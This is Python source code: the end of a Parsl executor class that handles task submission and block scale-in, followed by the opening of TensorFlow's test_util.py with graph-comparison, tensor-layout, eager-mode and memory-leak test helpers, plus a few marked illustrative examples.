buffer_threshold=1024 * 1024)
except TypeError:
raise SerializationError(func.__name__)
msg = {"task_id": task_id,
"buffer": fn_buf}
        # Post task to the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return fut
@property
def scaling_enabled(self):
return self._scaling_enabled
def create_monitoring_info(self, status):
""" Create a msg for monitoring based on the poll status
"""
msg = []
for bid, s in status.items():
d = {}
d['run_id'] = self.run_id
d['status'] = s.status_name
d['timestamp'] = datetime.datetime.now()
d['executor_label'] = self.label
d['job_id'] = self.blocks.get(bid, None)
d['block_id'] = bid
msg.append(d)
return msg
@property
def workers_per_node(self) -> Union[int, float]:
return self._workers_per_node
def scale_in(self, blocks=None, block_ids=[], force=True, max_idletime=None):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
force : Bool
Used along with blocks to indicate whether blocks should be terminated by force.
When force = True, we will kill blocks regardless of the blocks being busy
When force = False, Only idle blocks will be terminated.
If the # of ``idle_blocks`` < ``blocks``, the list of jobs marked for termination
will be in the range: 0 - ``blocks``.
max_idletime: float
A time to indicate how long a block can be idle.
Used along with force = False to kill blocks that have been idle for that long.
block_ids : list
List of specific block ids to terminate. Optional
Returns
-------
List of job_ids marked for termination
"""
if block_ids:
block_ids_to_kill = block_ids
else:
managers = self.connected_managers
block_info = {}
for manager in managers:
if not manager['active']:
continue
b_id = manager['block_id']
if b_id not in block_info:
block_info[b_id] = [0, float('inf')]
block_info[b_id][0] += manager['tasks']
block_info[b_id][1] = min(block_info[b_id][1], manager['idle_duration'])
sorted_blocks = sorted(block_info.items(), key=lambda item: (item[1][1], item[1][0]))
if force is True:
block_ids_to_kill = [x[0] for x in sorted_blocks[:blocks]]
else:
if not max_idletime:
block_ids_to_kill = [x[0] for x in sorted_blocks if x[1][0] == 0][:blocks]
else:
block_ids_to_kill = []
for x in sorted_blocks:
if x[1][1] > max_idletime and x[1][0] == 0:
block_ids_to_kill.append(x[0])
if len(block_ids_to_kill) == blocks:
break
logger.debug("Selecting block ids to kill since they are idle : {}".format(
block_ids_to_kill))
logger.debug("Current blocks : {}".format(self.blocks))
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
# Potential issue with multiple threads trying to remove the same blocks
to_kill = [self.blocks[bid] for bid in block_ids_to_kill if bid in self.blocks]
r = self.provider.cancel(to_kill)
job_ids = self._filter_scale_in_ids(to_kill, r)
# to_kill block_ids are fetched from self.blocks
# If a block_id is in self.blocks, it must exist in self.block_mapping
block_ids_killed = [self.block_mapping[jid] for jid in job_ids]
return block_ids_killed
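    # --- Illustrative sketch (not part of the original Parsl source). ---
    # A standalone mirror of the idle-block selection performed by scale_in()
    # when force=False and no max_idletime is given, so the policy can be read
    # without a live provider. The manager dicts are assumptions modelled on the
    # fields used above: 'active', 'block_id', 'tasks' and 'idle_duration'.
    @staticmethod
    def _example_select_idle_blocks(managers, blocks):
        block_info = {}
        for manager in managers:
            if not manager['active']:
                continue
            b_id = manager['block_id']
            if b_id not in block_info:
                block_info[b_id] = [0, float('inf')]
            block_info[b_id][0] += manager['tasks']
            block_info[b_id][1] = min(block_info[b_id][1], manager['idle_duration'])
        # Sort by (idle duration, outstanding tasks) and keep only blocks with
        # zero outstanding tasks, up to the requested number.
        sorted_blocks = sorted(block_info.items(),
                               key=lambda item: (item[1][1], item[1][0]))
        return [b_id for b_id, info in sorted_blocks if info[0] == 0][:blocks]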
def _get_launch_command(self, block_id: str) -> str:
if self.launch_cmd is None:
raise ScalingFailed(self, "No launch command")
launch_cmd = self.launch_cmd.format(block_id=block_id)
return launch_cmd
def shutdown(self):
"""Shutdown the executor, including all workers and controllers.
"""
logger.info("Attempting HighThroughputExecutor shutdown")
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import memory
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
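# Illustrative usage sketch (not part of the original TensorFlow source): build
# a tiny graph holding one small constant and verify it by name and op type.
# The op name "z" is an arbitrary assumption; array_ops.zeros with a small
# static shape is expected to lower to a single "Const" node.
def _example_assert_ops_in_graph():
  with ops.Graph().as_default() as g:
    array_ops.zeros([2, 3], name="z")
    return assert_ops_in_graph({"z": "Const"}, g)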
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
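# Worked example (illustrative, not part of the original TensorFlow source):
# when given a plain shape list rather than a Tensor, NHWCToNCHW simply
# reorders the entries, e.g. [batch, height, width, channels] becomes
# [batch, channels, height, width].
def _example_nhwc_to_nchw_shapes():
  assert NHWCToNCHW([1, 224, 224, 3]) == [1, 3, 224, 224]
  assert NHWCToNCHW([1, 8, 224, 224, 3]) == [1, 3, 8, 224, 224]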
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
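# Worked example (illustrative, not part of the original TensorFlow source):
# for a shape list, NHWCToNCHW_VECT_C splits the channel dimension into
# (C // 4, 4) and moves the first factor next to the batch dimension, so
# [N, H, W, C] becomes [N, C // 4, H, W, 4].
def _example_nhwc_to_nchw_vect_c_shape():
  assert NHWCToNCHW_VECT_C([1, 4, 6, 8]) == [1, 2, 4, 6, 4]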
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
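# Illustrative usage sketch (not part of the original TensorFlow source):
# skip_if accepts either a boolean expression or a callable. Using the optional
# portpicker import from the top of this file as the condition is an arbitrary
# choice for demonstration.
@skip_if(lambda: portpicker is None)
def _example_maybe_skipped():
  # The body only executes when portpicker was imported successfully; note that
  # the wrapper discards the return value of the decorated function.
  portpicker.pick_unused_port()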
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_cond_v2_old = control_flow_ops.ENABLE_COND_V2
enable_while_v2_old = control_flow_ops.ENABLE_WHILE_V2
control_flow_ops.ENABLE_COND_V2 = True
control_flow_ops.ENABLE_WHILE_V2 = True
try:
fn(*args, **kwargs)
finally:
control_flow_ops.ENABLE_COND_V2 = enable_cond_v2_old
control_flow_ops.ENABLE_WHILE_V2 = enable_while_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_ops.ENABLE_WHILE_V2 and control_flow_ops.ENABLE_COND_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and name.startswith("test") and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C code
exercised by a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifically on macOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
f(self, **kwargs)
else:
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
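# Illustrative usage sketch (not part of the original TensorFlow source): the
# decorator wraps an individual test method; any Tensor still referenced after
# the body returns (and a gc.collect()) raises an AssertionError. The class and
# method names below are assumptions for demonstration only.
class _ExampleTensorLeakCheck(object):

  @assert_no_new_tensors
  def _check_no_leak(self, **kwargs):
    # Creating and dropping a Tensor inside the wrapped body is fine, since
    # nothing keeps a reference to it once the body (and its graph) goes away.
    array_ops.ones([2, 2])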
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_distribution_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
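# Worked example (illustrative, not part of the original TensorFlow source):
# the keyword arguments below are arbitrary; single values are treated as
# one-element lists, and the result is the cross product of all options.
def _example_combine_named_parameters():
  combos = _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
  # combos == [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
  #            OrderedDict([("mode", "eager"), ("use_gpu", True)])]
  assert len(combos) == 2
  assert combos[0]["mode"] == "graph" and combos[0]["use_gpu"] is True
  return combos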
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
"test") and not name.startswith("testSkipEager"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None, this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the
session when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
